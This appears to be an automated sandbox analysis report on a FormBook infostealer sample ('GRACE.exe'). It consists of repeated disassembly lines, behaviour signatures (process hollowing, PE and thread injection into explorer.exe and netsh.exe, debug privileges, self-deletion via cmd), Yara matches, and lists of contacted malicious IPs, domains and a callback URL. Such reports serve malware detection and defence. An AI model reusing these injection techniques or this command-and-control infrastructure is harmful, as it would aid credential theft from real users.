Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h] 17_2_03724BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h] 17_2_03724BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372B390 mov eax, dword ptr fs:[00000030h] 17_2_0372B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722397 mov eax, dword ptr fs:[00000030h] 17_2_03722397
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B138A mov eax, dword ptr fs:[00000030h] 17_2_037B138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AD380 mov ecx, dword ptr fs:[00000030h] 17_2_037AD380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h] 17_2_03701B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h] 17_2_03701B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373927A mov eax, dword ptr fs:[00000030h] 17_2_0373927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h] 17_2_037AB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h] 17_2_037AB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C8A62 mov eax, dword ptr fs:[00000030h] 17_2_037C8A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BEA55 mov eax, dword ptr fs:[00000030h] 17_2_037BEA55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h] 17_2_036F9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h] 17_2_036F9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h] 17_2_036F9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h] 17_2_036F9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03784257 mov eax, dword ptr fs:[00000030h] 17_2_03784257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h] 17_2_0371A229
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h] 17_2_03734A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h] 17_2_03734A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03713A1C mov eax, dword ptr fs:[00000030h] 17_2_03713A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h] 17_2_037BAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h] 17_2_037BAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h] 17_2_036FAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h] 17_2_036FAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03708A0A mov eax, dword ptr fs:[00000030h] 17_2_03708A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov ecx, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h] 17_2_036F5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722AE4 mov eax, dword ptr fs:[00000030h] 17_2_03722AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722ACB mov eax, dword ptr fs:[00000030h] 17_2_03722ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0370AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h] 17_2_0370AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372FAB0 mov eax, dword ptr fs:[00000030h] 17_2_0372FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h] 17_2_036F52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h] 17_2_0372D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h] 17_2_0372D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FC962 mov eax, dword ptr fs:[00000030h] 17_2_036FC962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h] 17_2_036FB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h] 17_2_036FB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h] 17_2_0371B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h] 17_2_0371B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372513A mov eax, dword ptr fs:[00000030h] 17_2_0372513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372513A mov eax, dword ptr fs:[00000030h] 17_2_0372513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov eax, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov eax, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov eax, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov eax, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03714120 mov ecx, dword ptr fs:[00000030h] 17_2_03714120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h] 17_2_036F9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h] 17_2_036F9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F9100 mov eax, dword ptr fs:[00000030h] 17_2_036F9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h] 17_2_036FB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h] 17_2_036FB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036FB1E1 mov eax, dword ptr fs:[00000030h] 17_2_036FB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037841E8 mov eax, dword ptr fs:[00000030h] 17_2_037841E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037751BE mov eax, dword ptr fs:[00000030h] 17_2_037751BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037751BE mov eax, dword ptr fs:[00000030h] 17_2_037751BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037751BE mov eax, dword ptr fs:[00000030h] 17_2_037751BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037751BE mov eax, dword ptr fs:[00000030h] 17_2_037751BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037769A6 mov eax, dword ptr fs:[00000030h] 17_2_037769A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037261A0 mov eax, dword ptr fs:[00000030h] 17_2_037261A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037261A0 mov eax, dword ptr fs:[00000030h] 17_2_037261A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h] 17_2_037B49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h] 17_2_037B49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h] 17_2_037B49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B49A4 mov eax, dword ptr fs:[00000030h] 17_2_037B49A4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722990 mov eax, dword ptr fs:[00000030h] 17_2_03722990
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371C182 mov eax, dword ptr fs:[00000030h] 17_2_0371C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372A185 mov eax, dword ptr fs:[00000030h] 17_2_0372A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037B2073 mov eax, dword ptr fs:[00000030h] 17_2_037B2073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C1074 mov eax, dword ptr fs:[00000030h] 17_2_037C1074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03710050 mov eax, dword ptr fs:[00000030h] 17_2_03710050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03710050 mov eax, dword ptr fs:[00000030h] 17_2_03710050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h] 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h] 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h] 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0371A830 mov eax, dword ptr fs:[00000030h] 17_2_0371A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h] 17_2_0370B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h] 17_2_0370B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h] 17_2_0370B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370B02A mov eax, dword ptr fs:[00000030h] 17_2_0370B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0372002D mov eax, dword ptr fs:[00000030h] 17_2_0372002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03777016 mov eax, dword ptr fs:[00000030h] 17_2_03777016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03777016 mov eax, dword ptr fs:[00000030h] 17_2_03777016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03777016 mov eax, dword ptr fs:[00000030h] 17_2_03777016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C4015 mov eax, dword ptr fs:[00000030h] 17_2_037C4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C4015 mov eax, dword ptr fs:[00000030h] 17_2_037C4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F58EC mov eax, dword ptr fs:[00000030h] 17_2_036F58EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h] 17_2_036F40E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h] 17_2_036F40E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F40E1 mov eax, dword ptr fs:[00000030h] 17_2_036F40E1
Enables debug privileges
Source: C:\Users\user\Desktop\GRACE.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 216.250.110.35 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\GRACE.exe Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 16B0000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: AD2008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GRACE.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' Jump to behavior
Source: explorer.exe, 00000010.00000000.296358359.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Users\user\Desktop\GRACE.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344817 Sample: GRACE.exe Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 33 www.sterlworldshop.com 2->33 35 www.11sxsx.com 2->35 37 5 other IPs or domains 2->37 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 11 GRACE.exe 15 4 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 11->29 dropped 31 C:\Users\user\AppData\Local\...behaviorgraphRACE.exe.log, ASCII 11->31 dropped 61 Writes to foreign memory regions 11->61 63 Allocates memory in foreign processes 11->63 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 11->65 67 Injects a PE file into a foreign processes 11->67 15 AddInProcess32.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 2 other signatures 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 39 www.dl888.net 216.250.110.35, 49739, 80 DXTL-HKDXTLTseungKwanOServiceHK Hong Kong 18->39 41 www.ludisenofloral.com 18->41 43 3 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 22 netsh.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.250.110.35
 unknown Hong Kong
134548 DXTL-HKDXTLTseungKwanOServiceHK true

Contacted Domains

Name IP Active
www.luxusgrotte.com 217.160.0.171 true
gfw.cloud301.net 141.164.47.167 true
www.dl888.net 216.250.110.35 true
shops.myshopify.com 23.227.38.74 true
www.internetmarkaching.com 104.21.69.246 true
www.hongreng.xyz unknown unknown
www.ludisenofloral.com unknown unknown
www.11sxsx.com unknown unknown
www.sterlworldshop.com unknown unknown
www.kornteengoods.com unknown unknown
www.hotvidzhub.download unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.dl888.net/jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc true
  • Avira URL Cloud: safe
 unknown